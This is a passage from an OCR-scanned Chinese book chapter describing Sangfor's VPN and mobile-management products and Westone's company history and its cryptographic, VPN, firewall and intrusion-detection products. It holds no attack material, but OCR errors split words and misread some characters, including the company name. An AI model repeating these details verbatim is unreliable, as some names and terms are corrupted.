深信 服 IPSec VPN 能 够 为 中 小 型 分 支 提供 一 体 化 组 网 解决 方案 ,同时 实现 安全 、 高 
效 、 低 成 本 的 网 络 互 联 。 同 时 深信 服 下 一 代 防 火 墙 、 上 网 行为 管理 .广域网 加 速 系列 都 完 
美 融合 了 IPSec VPN 模块 ,分 别 为 客户 提供 安全 加 固 组 网 .一体 化 管控 组 网 ,加速 VPN 
组 网 的 解决 方案 。 

主要 的 产品 优势 如 下 。 

1) 灵活 的 组 网 解决 方案 

多 种 VPN 产品 种 类 : 3G/4G VPN、Wi-Fi VPN .MIG 一 体 化 安全 网 关 。 

深信 服 下 一 代 防 火 墙 上 网 行为 管理 .广域网 加 速 系列 也 融合 了 IPSec VPN 模块 , 满 
足 用户 各 种 差异 化 组 网 需求 。 并 且 所 有 平台 均 可 接 人 SC 集中 管理 平台 统一 管理 。 

2) 高 强度 的 链 路 安全 

支持 多 种 加 密 算法 ,包括 DES、3DES、MD5、AES、SHA-1、SANGFOR_DES, 同时 支 
持 国 密 办 SM2、SM3、SM4 加 密 算法 ; 硬件 证 书 认 证 ,移动 客户 端 专线 功能 ;保障 用 户 访 
问安 全 数据 传输 安全 。 

3) 线路 优化 技术 

通过 自主 开发 的 畅 联 技术 、 多 线路 技术 ,选择 最 优 线路 接 入 ,并 显著 提升 高 丢 包 环境 
下 的 网 络 质量 ,打造 无 与 伦比 的 访问 体验 。 

4) 部 署 便 利 , 简 化 管理 

通过 隧道 内 NAT 技术 ,使 具有 相同 IP 地 址 的 分 支 机 构 ,无 须 改变 IP 地 址 即 可 接 入 
VPN 网 络 , 部 署 简 便 ; 硬 件 一 体 化 的 集中 管理 ,实现 全 网 数 万 个 VPN 节点 的 集中 管理 ， 
实时 监控 ,远程 维护 智能 升级 和 日 志 统 一 管理 。 


Cs 网 络 安全 解决 方案 供应 商 及 产品 。 205 


4. SSL VPN 


SSL VPN 以 SSL/IPSec 二 合 一 VPN 安全 网 关 为 基础 ,融合 远程 应 用 发 布 
(EasyConnect) ,企业 应 用 安全 加 固 (EasyApp) 等 多 种 移动 终端 的 安全 接 入 方式 ,通过 构 
建 一 套 平台 , 即 可 满足 移动 办 公分 支 互 联 、 协 同 办 公 、 应 用 虚拟 化 .APP 安全 加 固 业务 需 
求 。 同 时 提升 移动 接 人 的 安全 性 ,简化 安全 策略 的 部 署 ,优化 传输 速度 ,让 用 户 获 得 最 佳 
的 移动 访问 体验 ,帮助 企业 节省 大 量 的 IT 建设 成 本 。 

主要 的 产品 优势 如 下 。 

1) 安全 

端 到 端的 安全 防护 体系 ,业内 领先 加 密 技 术 , 多 种 认证 方式 . 主 从 绑 定 等 特色 功能 ， 
保证 用 户 身 份 安全 终端 /数据 安全 ,传输 安全 、 应 用 权限 安全 和 审计 安全 。 

2) 快速 

多 项 专利 技术 ,从 链 路 ,传输 .数据 、 应 用 , 层 层 优化 ,访问 速度 可 提升 80% ,给 每 个 接 
入 用 户 不 同 以 往 的 畅快 体验 。 

3) 好 用 

全 面 支持 Windows、MAC、Linux 等 主流 操作 系统 及 主流 浏览 器 接 入 ,同时 支持 虚拟 
门户 .应 用 单 点 登录 等 功能 ,将 系统 部 署 和 管理 化 繁 为 简 ,管理 容易 ,使 用 方便 。 

4) 全 面 

提供 丰富 的 移动 端 解决 方案 : 应 用 虚拟 化 EasyConnect ,无 须 二 次 开发 即 可 实现 业 
务 系统 轻松 迁移 ;安全 加 固 EasyApp 自动 集成 VPN 模块 ,实现 数据 加 密 。 最 全 面 的 解 
决 方案 ,完美 实现 业务 移动 化 。 


5. 深信 服 企业 移动 管理 EMM 


员工 只 需要 下 载 一 个 EMM 套件 ,简单 登录 ,注册 后 ,IT 管理 员 即 可 从 移动 设备 管理 
(MDM) ,移动 用 户 管理 (MUM) 移动 应 用 管理 (MAM) 移动 内 容 管 理 (MCM) 四 个 维 
度 , 有 效 解决 移动 业务 开展 过 程 中 遇 到 的 各 种 安全 风险 ,并 提升 移动 终端 APP 应 用 的 管 
理 效 率 。 

其 功能 模块 如 下 。 

1) 移动 设备 管理 MDM 

支持 对 移动 设备 进行 管理 ,包括 设备 注册 设备 擦 除 、 用 户 关联 、 策 略 关 联 、 状 态 监 测 
等 功能 ,帮助 管理 员 轻 松 管理 海量 设备 ,降低 运 维 成 本 。 

2) 移动 用 户 管理 MUM 

支持 对 移动 用 户 的 全 面 管理 ,包括 16 级 用 户 认 证 鉴 权 、7 种 认证 方式 .用户 权 限 与 移 
动 设备 关联 等 功能 ,轻松 实现 多 部 门 用 户 管理 以 及 细 粒 度 权限 管控 ,减轻 管理 员 运 维 
压 为 。 

3) 移动 应 用 管理 MAM 

APP 安全 加 固 、 企 业 应 用 商店 、 移 动 应 用 单 点 登录 等 功能 ,简化 应 用 加 固 分 发 和 用 
登录 使 用 过 程 ,为 用 户 提供 更 加 易 用 的 企业 应 用 使 用 环境 。 
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4) 移动 内 容 管理 MCM 

提供 一 套 有 效 的 工具 ,方便 企业 管理 者 对 移动 设备 上 的 文件 和 数据 进行 分 发 .管理 
和 保护 。 信 息 则 不 会 因为 设备 的 遗失 .更换 和 员工 离职 等 情况 而 造成 泄露 。 

主要 的 产品 优势 如 下 。 

1) 一 站 式 智 能 管理 

包含 终端 设备 管理 .应 用 管控 ,数据 管控 .员工 管控 等 全 面 的 移动 业务 管理 功能 , 提 
供 高 效 方便、 统一 的 管理 模式 ,降低 运 维 成 本 。 

2) 全 方位 安全 体系 

多 种 安全 认证 支持 ,落地 文件 数据 加 密 、 传 输 数 据 加 密 、 精 细 化 权限 控制 等 多 重 安全 
手段 ,保障 业务 安全 ,并 支持 远程 对 设备 应 用 进行 安装 、 锁 定 擦 除 、 原 生 功 能 禁用 等 操作 。 

3) 卓越 的 用 户 体验 

轻松 下 载 企 业 应 用 支持 应 用 单 点 登录 等 功能 ,为 用 户 提供 优质 用 户 体验 ,符合 时 下 
主流 Android ,iOS 系统 平台 用 户 使 用 习惯 ,操作 简单 .便捷 。 

4) BYOD 的 公私 隔离 

企业 数据 被 单独 保存 在 终端 上 的 加 密 隔 离 区 ,同时 下 载 的 应 用 仅 限 于 指定 的 企业 应 
用 可 以 打开 ,保障 数据 安全 的 同时 实现 了 一 机 两 用 ,降低 成 本 。 


46 三 士 通 信和 齐 产业 股份 有 限 公 司 


卫 十 通信 息 产业 股份 有 限 公司 涉及 通信 保密 与 信息 安全 ,信息 网 络 与 多 媒体 终端 及 
系统 产品 的 开发 .生产 销售、 工程 建设 (涉及 前 置 审批 的 批准 后 方 可 经 营 ); 税 控 收 坎 机 
系列 产品 ,金融 及 贸易 结算 电子 设备 .IC 卡 机 具 设 备 、 微 型 计算 机 系统 产品 及 相关 软件 等 
电子 信息 技术 产品 的 研制 .生产 ,组装 、 销 售 \ 工 程 集成 和 技术 服务 ;无 线 通信 系统 (不 含 
无 线 电 发 射 设备 ) .图 像 设备 .电子 设备 .电子 计算 机 及 外 围 设备 .耗材 ;电子 元 器 件 .专用 
芯片 的 研制 .生产 .销售 .工程 建设 ,系统 集成 及 技术 咨询 与 服务 ; 自 营 和 代理 各 类 商品 及 
技术 的 进出 口 业务 ,但 国家 限定 公司 经 营 或 禁止 进出 口 的 商品 及 技术 除外 。 


461 基本 情况 


卫士 通 系 根据 成 都 市 经 济 体制 改革 委员 会 成 体 改 (1998)28 号 (关于 同意 设立 成 都 卫 
士 通信 息 产业 股份 有 限 公司 的 批复 ) 批 准 ,由 电子 工业 部 第 三 十 研究 所 (后 更 名 为 中 国电 
子 科技 集团 公司 第 三 十 研究 所 ,简称 “30 所 ”) ,西南 通信 研究 所 和 成 都 西 通 开 发 公司 ,以 
及 罗 天 文 等 1418 名 自然 人 共同 发 起 设立 。 依 托 30 所 40 年 深厚 的 专业 技术 及 人 才 资 源 
积淀 ,凭借 高 效 的 现代 企业 运作 机 制 和 持续 的 战略 创新 ,卫士 通 已 发 展 成 为 我 国 最 具 主 
导 地 位 的 信息 安全 产业 龙头 企业 ,以 此 为 核心 拓展 税务 电子 化 、 金 融 电 子 化 、 电 子 商务 等 
安全 IT 化 业务 ,实现 企业 规模 化 发 展 。 并 于 2008 年 7 月 成 功 上 市 ,成 为 “中 国信 息 安 全 
第 一 股 ”。 
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462 发 展 历程 


1998 年 4 月 23 日 ,成 都 卫士 通信 息 产 业 股份 有 限 公司 注册 成 立 。 同 年 获 高 新 技术 
企业 认定 证 书 。 

2000 年 12 月 ,上 海 与 沈阳 卫士 通 注册 成 立 。 同 年 获 国家 密码 管理 委员 会 商用 密码 
产品 研制 .生产 、 销 售 定点 企业 资格 。 并 且 通 过 ISO9001 质量 体系 认证 。 

2001 年 1 月 ,北京 卫士 通 注册 成 立 。 卫 士 通 通过 软件 企业 认定 ,并 被 国家 人 事 部 定点 
为 "高 新 技术 开发 区 企业 博士 后 科研 工作 站 ”。 同 年 ,被 四 川 省 国家 保密 局 认定 “四 川 省 涉 密 
计算 机 网 络 设计 与 施工 单位 >。 同 年 6 月 ,四 川 卫 士 通 安全 模块 有 限 公司 成 立 。 同 年 9 月 ， 
深圳 卫士 通 注册 成 立 。 同 年 9 月 ,卫士 通 一 电子 科大 信息 安全 联合 实验 室 成 立 。 

2002 年 ,卫士 通 被 国家 保密 局 认定 “ 涉 密 计算 机 信息 系统 集成 资质 ”"。 并 获得 国家 对 
外 贸易 经 济 合 作 部 核准 “进出 口 经 营 资 格 企业 ”。 

2004 年 7 月 ,卫士 通 公司 防火 墙 事业 部 成 立 。 同 年 9 月 ,陕西 卫士 通 成 立 。 同 年 10 
月 ,广州 卫士 通 公司 成 立 。 

2005 年 ,被 中 诚 资 信 评 级 事务 所 评定 为 "AAA 资信 等 级 企业 ”"。 同 年 ,国家 保密 局 认 
定 为 “ 涉 密 计算 机 信息 系统 集成 甲 级 资质 ”。 

2006 年 ,被 信息 产业 部 核定 为 “计算 机 信息 系统 集成 二 级 资质 "。 同 年 ,国家 发 展 改 
革 委 .信息 产业 部 .商务 部 .国家 税务 总 局 四 部 委 联合 认定 为 “2006 年 度 国家 规划 布局 内 
重点 软件 企业 ”。 

2007 年 ,卫士 通 获得 军队 装备 .物质 网 络 采购 资格 认证 。 

2008 年 4 月 , 获 “2008 年 度 中 国信 息 安全 值得 信赖 品牌 奖 *"。 同 年 5 月 , 获 “2008 中 
国 创 新 软件 企业 ”( 中 国 软件 行业 协会 ) 。 同 年 12 月 , 获 “2008 年 度 电子 信息 产业 统计 工 
作 先 进 集 体 ”“( 四 川 省 信 产 厅 ) 。 

2009 年 4 月 , 获 * 改 革 开放 三 十 年 中 国信 息 安全 产业 最 具 竞争 力 企业 ”称号 。 同 年 ， 
还 获 “ 改 革 开 放 三 十 年 中 国信 息 安全 优秀 企业 文化 ” 奖 。 

2010 年 3 月 , 获 “2009 一 2010 中 国信 息 加 密 市 场 年 度 成 功 企业 ” 奖 ( 赛 迪 顾问 )。 

2011 年 4 月 ,获得 “2011 年 最 具 创新 能 力 的 信息 安全 十 大 企业 ”称号 。 同 年 ,还 获得 
“2010 年 度 国家 规划 布局 内 重点 软件 企业 ”称号 。 

2012 年 7 月 ,获得 “2012 中 国信 息 安全 突出 成 就 奖 ”。 

2013 年 ,卫士 通 获得 计算 机 信息 系统 集成 一 级 资质 。 


463 主要 产品 
其 安全 产品 主要 分 为 3 类 : 密码 产品 .信息 安全 产品 与 IT 产品 。 


1. 密码 产品 


1) 密码 系统 
(1) 密 钥 管理 系统 。 密 钥 管 理 系统 以 密码 技术 为 核心 .管理 平台 为 基础 ,实现 非 对 称 
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密 钥 管理 、 对 称 密 钥 管理 .密码 设 备 管理 .密码 合 规 性 管理 .密码 应 用 有 效 性 管理 和 综合 
管理 等 功能 。 密 钥 管 理 系统 由 非 对 称 密 钥 管理 服务 、 对 称 密 钥 管理 服务 、 密 码 合 规 性 管 
理 服务 密码 应 用 有 效 性 管理 服务 .综合 管理 平台 、 数 据 库 .SHJ0901-B 服务 器 密码 机 及 
客户 端 `USBKey 共同 组 成 。USBKey 数量 可 根据 实际 需求 进行 配置 。 密 钥 管 理 系统 支 
持 系统 级 联 模式 ,可 以 根据 实际 的 应 用 环境 及 需求 进行 系统 级 联 配置 。 级 联 配置 成 功 
后 ,系统 将 分 为 中 心 和 分 中 心 两 级 ,中 心 和 分 中 心 之 间 的 数据 通信 均 由 级 联 服务 提供 传 
输 通道 和 加 密 保 护 。 密 钥 管理 系统 采用 Java/JSP 开发 ,符合 J2EE 规范 。 系 统 操作 人 员 
通过 B/S 方式 与 系统 交互 ,密码 设备 通过 C/S 方式 与 系统 进行 交互 。 主 要 功能 包括 非 对 
称 密 钥 管理 .对称 密 钥 管理 、 密 码 合 规 性 管理 .密码 应 用 有 效 性 管理 .综合 管理 平台 。 

(2) 数字 证 书 认证 系统 。 数 字 证 书 认证 系统 是 卫士 通 公 司 研制 的 一 套 公 钥 基础 设施 
系统 ,通过 国 密 局 最 新 发 布 的 各 项 规范 ,并 通过 国 密 局 鉴定 ,鉴定 型 号 SZT1206。 本 系统 
实现 了 对 生命 周期 内 的 数字 证 书 进 行 全 过 程 管理 ,是 维护 有 关 各 方 在 网 络 中 的 合法 权 
益 ,提高 网 络 与 信息 安全 保障 能 力 的 重要 手段 。 数 字 证 书 认证 系统 不 仅 能 够 提供 用 户 注 
册 、 审 核 , 密 钥 产生 、 分 发 ,证 书签 发 . 制 证 及 发 布 等 基本 功能 ,还 能 为 其 他 应 用 系统 提供 
证 书 下 载 ,在 线 证 书 状 态 查 询 、 可 信 时 间 等 服务 ,使 其 他 系统 能 够 更 方便 地 利用 数字 证 书 
认证 系统 实现 安全 应 用 。 

2) 密码 模块 

(1) PCI 密码 卡 。 卫 士 通 公司 经 过 多 年 的 密码 研发 经 验 , 推 出 了 一 系列 安全 密码 模 
块 。 该 系列 密码 模块 使 用 国家 主管 部 门 批准 的 密码 算法 ,支持 真 随机 数 产 生 ,支持 多 进 
程 、 多 线程 应 用 ,支持 多 卡 并 行 处 理 , 支 持 Windows 98/ME/2000/XP、Linux 等 主流 操作 
系统 ,并 且 该 系列 密码 模块 拥有 多 种 标准 接口 ,多 种 加 密 速度 ,可 满足 各 种 环境 下 的 需 
要 。 目前 该 系列 密码 模块 已 经 通过 国家 主管 部 门 的 安全 认证 。 

(2) USBKey 密码 模块 。USBKey 产品 由 硬件 和 软件 程序 组 成 。 硬 件 内 部 生成 真 随 
机 数 , 它 提供 USBKey 通用 的 数据 加 解密 、 数 字 签 名 验证 \ 证 书 存储 和 文件 管理 等 功能 。 
软件 部 分 提供 设备 的 初始 化 解锁 等 管理 工具 、 常 用 的 CSP 和 csp 补充 接口 等 ,可 以 满足 
各 种 应 用 开发 的 安全 需求 。 产 品 支持 国产 商用 算法 和 国际 通用 算法 。 具 有 算法 种 类 丰 
富 ,存储 容量 大 、 算 法 快 等 特点 ,采用 低 功 耗 设计 ,能 够 满足 各 种 商用 安全 应 用 的 需求 ,可 
以 应 用 于 网 上 银行 .金融 证 券 交 易 管理 .电子 商务 交易 中 的 身份 认证 、 数 字 签 名 数据 加 
密 等 领域 ,以 及 个 人 及 企 事业 单 位 计算 机 终端 安全 防护 数据 安全 存储 、 监 控 审 计 、 服 务 
器 加 固 、VPN 安全 通道 建立 等 各 种 应 用 当中 ,具备 广阔 的 市 场 空间 。 

3) 密码 设备 

(1) 服务 器 密码 机 。 服 务 器 密码 机 是 卫士 通 自主 研制 ,通过 国家 主管 部 门 鉴定 的 安 
全 密码 产品 ,为 计算 机 信息 及 数据 传输 提供 基于 最 新 密码 技术 的 强 安 全 保护 产品 。 服 务 
器 密码 机 产品 系列 包括 SJY15-A 服务 器 密码 机 、SJY15-C 服务 器 密码 机 、SHJ0901-A/B 
服务 器 密码 机 。 服 务 器 密码 机 针对 安全 性 要 求 高 高速 ,高 性 能 应 用 环境 而 研制 开发 的 ， 
其 功能 完善 .算法 运算 速率 高 .并 发 工作 容量 大 。 作 为 高 端的 商用 基础 密码 产品 , 它 既 可 
以 为 信息 安全 传输 系统 提供 高 性 能 的 数据 加 /解密 服务 ,又 可 以 作为 主机 数据 安全 存储 
系统 、 身 份 认证 系统 以 及 对 称 、 非 对 称 密 钥 管 理 系 统 的 主要 密码 设备 和 核心 构件 ,具有 广 
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泛 的 系统 应 用 潜力 。 可 广泛 应 用 在 银行 .保险 、 证 券 . 交 通 、 邮 政 .电子 商务 、 移 动 通信 等 
行业 的 安全 业务 应 用 系统 中 。 

(2) 金融 数据 密码 机 。 人 金融 数据 密码 机 是 卫士 通 自主 研制 ,主要 用 于 银行 金融 信息 
系统 ,跨行 交易 ATM/POS 联网 信息 系统 ,网 络 支 付 系统 等 。 为 敏感 信息 提供 数据 机 密 
性 、 完 整 性 、 抗 抵赖 等 安全 保护 。 卫 士 通 金融 数据 密码 机 在 国内 属于 首创 ,在 整体 技术 上 
已 达到 或 接近 国外 同类 先进 产品 ,并 率先 在 国内 通过 由 国家 密码 管理 委员 会 组 织 的 专家 
鉴定 ( 国 密 证 第 0009 号 ) 。 金 融 数据 密码 机 产品 系列 包括 SJL05 金融 数据 密码 机 和 
SJL05-A 主机 加 密 服务 器 等 产品 。 

(3) 签名 验 签 服务 器 。 卫 士 通 针对 我 国电 子 政务 .电子 商务 和 企业 信息 化 系统 建设 
的 安全 需求 ,设计 研制 了 符合 国家 管理 规定 和 标准 规范 的 签名 验 签 服务 器 。 签 名 验 签 服 
务 器 是 面向 各 类 电子 数据 ,提供 基于 数字 证 书 的 数据 签名 服务 .并 对 签名 数据 验证 其 签 
名 真实 性 和 有 效 性 的 专用 服务 器 。 签 名 验 签 服务 器 可 以 广泛 应 用 于 网 上 审批 ,网 上 办 
公 、 网 上 银行 ,网 上 证 券 和 网 上 支付 等 电子 政务 .电子 商务 和 企业 信息 化 中 ,为 业务 系统 
提供 安全 保护 。 


2. 信息 安全 产品 


1) 安全 管理 

(1) 统一 用 户 管理 系统 。 统 一 用 户 管理 系统 是 安全 应 用 支撑 平台 的 核心 组 成 部 分 ， 
负责 对 多 应 用 系统 中 的 用 户 信息 进行 统一 管理 ,主要 包括 组 织 机 构 信 息 .用 户 信息 、 应 用 
系统 账号 信息 等 。 管 理 人 员 使 用 用 户 管理 系统 能 够 方便 .高效 地 对 各 个 应 用 系统 中 的 用 
户 信息 进行 管理 。 同 时 ,用 户 管理 系统 还 是 证 书 管理 系统 、 授 权 系统 .身份 认证 系统 . 单 
点 登录 系统 的 基础 ,为 这 些 系 统 提供 统一 的 用 户 信息 。 

(2) 综合 文档 管理 系统 。 综 合 文档 管理 系统 是 一 套 高 效 且 安全 的 文档 流转 和 输入 输 
出 管理 系统 ,通过 文档 集中 存储 和 管理 文档 内 部 流转 和 交换 等 方式 ,对 日 常 办 公 常 用 的 
文档 ,如 Word、WPS、PDF 提供 盖 章 、 水 印 . 分 类 标签 、 二 维 条 码 、 数 字 签 名 、 手 写 签 名 等 
标识 功能 ,借助 二 维 条 码 技术 ,结合 RFID 卡 ( 如 员工 卡 、 门 禁 卡 ) 等 ,实现 文档 打印 .文档 
内 部 交互 ,文档 输入 输出 ,文档 借阅 /归还 等 功能 。 此 外 ,综合 文档 管理 系统 还 提供 统一 
管理 平台 ,对 标识 进行 统一 制作 、 授 权 、 下 发 和 集中 审计 等 一 系列 安全 措施 ,在 满足 文档 
高 效 管理 需求 的 同时 又 能 确保 文档 使 用 的 安全 性 。 

2) 数据 安全 

(1) 电子 文档 安全 管理 系统 。 卫 士 通电 子 文档 安全 管理 系统 属于 “一 Key 通 ” 局 域 
网 综合 安全 防护 系统 中 的 子 系统 ,该 系统 满足 用 户 对 电子 文档 信息 进行 集中 安全 存储 ， 
对 电子 文档 信息 输入 ,输出 进行 严格 的 管理 和 监控 ;对 纸 质 文档 入 库 、 查 看 、 销 毁 等 的 管 
理 的 需求 。 卫 十 通电 子 文档 安全 管理 系统 ,提供 文档 的 加 密 存放 、 集 中 管理 ,文档 共享 、 
二 维 条 码 管理 。 人 员 和 文档 实现 密级 管理 ,严格 控制 文档 流转 过 程 ,包括 交换 、 共 享 、 打 
印 等 操作 。 

(2) 刻录 控制 与 审计 系统 。 卫 士 通 刻录 控制 与 审计 系统 满足 用 户 对 信息 终端 光盘 刻 
录 行 为 的 管理 和 控制 需求 ,采用 数据 加 密 .访问 控制 等 安全 技术 手段 ,对 终端 光盘 刻录 输 
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出 行为 进行 管控 。 

(3) 电子 文档 内 容 标识 安全 中 间 件 。 电 子 文 档 内 容 标 识 安全 中 间 件 提供 对 MS 
Office Word、Excel.PowerPoint 文档 和 PDF 文档 添加 盖 章 水印、 分 类 标签 、 二 维 条 码 、 
数字 签名 .手写 签名 等 标识 的 功能 。 同 时 提供 统一 管理 平台 ,对 标识 进行 统一 制作 、 授 
权 、 下 发 和 集中 审计 等 一 系列 安全 措施 ,在 使 用 方便 的 前 提 下 ,又 能 确保 安全 性 。 本 产品 
与 办 公 软 件 无 缝 结合 ,不 改变 用 户 已 有 习惯 , 即 可 独立 使 用 ,也 提供 丰富 的 二 次 开发 接 
口 ,可 以 和 OA 系统 流程 进行 无 颖 结合 。 

(4) 消息 队列 安全 中 间 件 。 卫 士 通 公司 推出 了 一 套数 据 安 全 交互 产品 , 即 消息 队列 
安全 中 间 件 。 该 产品 不 仅 解决 了 系统 间 交 互 方式 与 交互 模式 不 统一 的 问题 ,也 采用 专业 
安全 方案 保障 了 数据 交互 的 安全 性 。 

3) 主机 安全 

(1) 终端 安全 防护 系统 (平台 版 )。 系 统 综合 利用 数据 加 密 、 身 份 认证 等 安全 技术 , 解 
决 了 终端 的 安全 控制 和 防护 问题 。 由 于 近年 来 用 户 新 购买 的 计算 机 一 般 都 预 装 
Windows 7, 所 以 卫士 通 公 司 升级 原 有 终端 安全 防护 系统 ,让 其 支持 Windows 7/ 
Windows Server 2008, 同 时 采用 “框架 平台 十 核心 模块 = 产品 ”的 模式 形成 终端 安全 防护 
系统 (平台 版 ) 。 

(2) 服务 器 加 固 系 统 。 服 务 器 加 固 系统 基于 主动 防御 的 模式 ,以 控制 木马 病毒 的 源 
头 为 基础 建立 安全 防护 系统 。 系 统 根据 程序 白 名 单 , 控 制程 序 模块 的 装载 过 程 ,允许 合 
法 名 单 中 的 程序 运行 ,拒绝 执行 不 合法 的 程序 。 系 统 摆脱 传统 的 杀毒 模式 ,基于 主动 防 
御 模 式 ,从 源头 禁止 木马 病毒 程序 运行 ,杜绝 木马 病毒 的 感染 。 同 时 使 用 终端 密码 模块 
并 结合 安全 登录 功能 ,实现 双 因 子 强身 份 认证 登录 ,对 操作 系统 进行 安全 加 固 ,解决 终端 
无 法 进行 实名 登录 登记 的 问题 。 

(3)“ 一 Key 通 ” 主 机 监控 与 审计 系统 产品 。 本 系统 强化 对 终端 计算 机 的 管理 和 控 
制 , 其 中 包括 : 存储 介质 管理 .外 设 控制 .进程 控制 .主机 状态 监视 .主机 配置 监视 、 网 络 流 
量 控制 .实时 状态 监视 ,非法 接 人 控制 .共享 控制 .服务 控制 .补丁 管理 .打印 控制 .流量 防 
火 墙 .登录 管理 .刻录 控制 和 文件 监控 等 。 

(4) 涉 密 计算 机 及 移动 存储 介质 保密 管理 系统 。 涉 密 计算 机 及 移动 存储 介质 保密 管 
理 系 统 以 密码 技术 、 内 核 驱动 技术 、 单 向 导入 技术 为 核心 ,从 技术 上 满足 计算 机 违规 外 联 
监视 及 控制 , 涉 密 移动 存储 介质 的 管控 及 使 用 、 非 密 移动 存储 介质 的 单 向 导入 等 功能 。 

4) 网 络 安全 

(1) IPSec VPN 安全 网 关 。SJW84 IPSec VPN 系统 为 用 户 提供 了 在 不 可 信 的 公共 
网 络 中 信息 传输 的 机 密 性 完整 性 .数据 源 认证 及 部 分 抗 重 放 功能 。 采 用 国际 标准 IPSec 
协议 族 、 所 有 安全 保护 算法 都 通过 了 国家 主管 部 门 的 审批 ,系统 遵循 国家 密码 管理 局 
《IPSec VPN 技术 规范 》。SJW84 支持 高 强度 的 国 密 SM1/SM4 加 密 算 法 ,支持 DES、 
3DES、AES 算 法 ,支持 SM3、SHA-1 哈 希 验证 算法 。 集 专用 操作 系统 、 信 息 加 /解密 、 身 
份 认 证 、 防 火 墙 流量 保护 和 控制 .安全 规则 管理 .丰富 完整 的 日 志 记录 等 功能 为 一 体 , 提 
供 了 可 靠 高速. 安全 的 网 络 安全 功能 。 

(2) 中 华 卫士 网 络 行为 管理 与 审计 系统 。 中 华 卫士 UAG 系列 网 络 行为 管理 系统 是 
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成 都 卫士 通 公 司 自 主 研发 的 业界 领先 的 上 网 行为 管理 产品 ,以 路 由 、 透 明 或 混合 模式 部 
署 在 网 络 的 关键 节点 上 ,对 数据 进行 2 一 7 层 的 全 面 检查 和 分 析 , 深 度 识别 .管控 和 审计 
数 百 种 IM 聊天 软件 、.P2P 下 载 软件 、 炒 股 软 件 、 网 络 游 戏 应 用 、 流 媒体 在 线 视频 应 用 等 常 
见 应 用 ,并 利用 智能 流 控 、 智 能 阻 断 .智能 路 由 、 智 能 DNS 策略 等 技术 提供 强大 的 带宽 管 
理 特 性 ,配合 创新 的 社交 网 络 行为 精细 化 管理 功能 清晰 易 管 理 日 志 等 功能 ,提供 业界 最 
全 面 、 完 善 的 上 网 行为 管理 解决 方案 。 卫 士 通 UAG 上 网 行为 管理 产品 提供 不 同 档次 的 
多 款 型 号 ,适用 于 数据 中 心 ,大 型 网 络 边界 .中 小 型 企业 等 全 业务 应 用 场景 。 

(3) 中 华 卫 士 人 侵 检测 与 防御 系统 。 中 华 卫 十 人 侵 检 测 与 防御 系统 是 卫士 通 公 司 自 
主 研发 的 业界 领先 的 应 用 层 安全 产品 ,实现 了 业内 传统 的 IDS 入 侵 检 测 .IJPS 入 侵 防 御 、 
AVG 防毒 墙 \WAF 网 站 防火 墙 四 合 一 。 能 够 针对 数据 进行 2 一 7 层 的 全 面 检查 与 分 析 ， 
实时 阻 断 和 记录 网 络 流量 中 的 病毒 .蠕虫 .木马 .间谍 软件 .网 页 算 改 .注入 攻击 、 跨 站 脚 
本 攻击 、DoS/DDoS 攻击 漏洞 扫描 、 异 常 协议 .网络 钓鱼 等 网 络 攻击 ,准确 全 面 识别 包括 
IM 软件 .P2P 工具 、 流 媒体 、 网 络 游戏 、 股 票 软件 等 在 内 的 各 种 的 网 络 应 用 ,并 灵活 地 进 
行 精细 化 控制 。 更 集成 了 URL 过滤、Web 认证 .关键 字 过 滤 .垃圾 邮件 隔离 等 多 种 功能 ， 
为 您 提供 业界 最 全 面 .完善 的 应 用 层 安 全 解决 方案 。 

(4) 中 华 卫士 下 一 代 防 火 墙 。 集 成 全 面 的 安全 防护 功能 ,支持 丰富 的 安全 业务 部 署 ， 
实现 了 对 新 型 安全 威胁 的 全 面 防护 。 采 用 先进 的 MIPS 多 核 架 构 , 结 合 卫 士 通 自主 知识 
产权 的 安全 操作 系统 ,采用 攻击 特征 库 、 病 毒 库 树 形 存储 、 流 扫描 处 理 等 领先 的 防 病毒 技 
术 ,并 采用 零 复制 并 行 流 处 理 等 高 效 的 防 攻击 技术 ,整个 解析 过 程 一 次 拆 包 ,保证 开启 多 
重 防护 功能 后 依然 保证 高 速度 . 低 时 延 的 安全 防护 。 采 用 了 硬件 DFA 加 速 引 擎 ,硬件 
DFA 处 理 机 制 与 会 话 数量 和 性 能 无 关 .与 策略 数量 和 性 能 无 关 ,与 特征 数量 和 性 能 无 关 、 
与 协议 数量 和 性 能 无 关 , 所 以 性 能 不 随 策略 数 、 会 话 数 .特征 库 增 加 而 下 降 , 可 带 来 精准 
而 快速 的 七 层 扫描 。 拥 有 海量 病毒 特征 库 , 配 合 先进 的 反 病毒 引擎 ,能 够 精准 识别 并 清 
除 流行 木马 和 顽固 病毒 。 新 一 代 启 发 式 检 测 技术 ,通过 对 程序 行为 的 智能 分 析 , 及 时 发 
现 最 新 的 未 知 病毒 威胁 ,提示 用 户 及 时 修复 系统 和 第 三 方 软件 (Flash、Adobe Reader 等 ) 
漏洞 ,有效 保障 系统 安全 。 并 且 还 有 遏制 带宽 滥用 、 反 垃圾 邮件 ,独立 的 VPN 模块 .精准 
全 面 的 事后 审计 ,高 可 靠 性 .易于 维护 等 特性 。 

(5) SSLVPN 安全 接 人 网 关 。SJJ1122 SSLVPN 安全 接 人 网 关系 列 是 国内 领先 的 信 
息 安 全 产品 供应 商 及 解决 方案 提供 商 一 卫士 通 公 司 ( 股 票 代 码 : 002268) 面 向 企业 级 市 场 
及 各 级 行业 市 场 推出 的 ,新 一 代 高 性 能 的 ,通过 国 密 局 鉴定 的 , 合 规 性 的 SSLVPN 安全 接 
人 网 关 ,SJJ1122 SSLVPN 安全 接 人 网 关系 列 产品 集 远程 安全 接 人 \、 反 向 代理 、 单 点 登录 、 
防火 墙 等 多 种 功能 于 一 体 ,支持 SM1/SM2/SM3/SM4 算法 及 国际 通用 算法 ,为 中 小 企 
业 ,分 支 机 构 、 大 型 行业 用 户 提 供 多 方位 、 深 层次 的 安全 防护 。 

(6) 安全 认证 网 关系 统 。 安 全 认证 网 关系 统 以 密码 .访问 控制 .代理 和 PKI 技术 为 
核心 ,利用 终端 密码 模块 (USB-Key) 等 硬件 ,实现 了 身份 认证 、 通 道 加 密 、 协 议 代理 和 基 
于 角色 的 访问 控制 等 主要 功能 ,有 效 地 满足 了 网 络 身 份 认证 ,访问 控制 和 事后 审计 等 方 
面 的 需求 。 同 时 ,系统 支持 与 应 用 系统 相 结合 的 SSO( 单 一 登录 ) ;支持 多 台 安 全 认证 网 
关 集 群 部 署 并 统一 管理 等 功能 。 
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3. IT 产品 


1) 龙芯 计算 机 系列 

龙芯 计算 机 系列 是 卫士 通 公司 自主 研发 的 中 国 自 主 可 信 计 算 机 。 该 计算 机 符合 中 
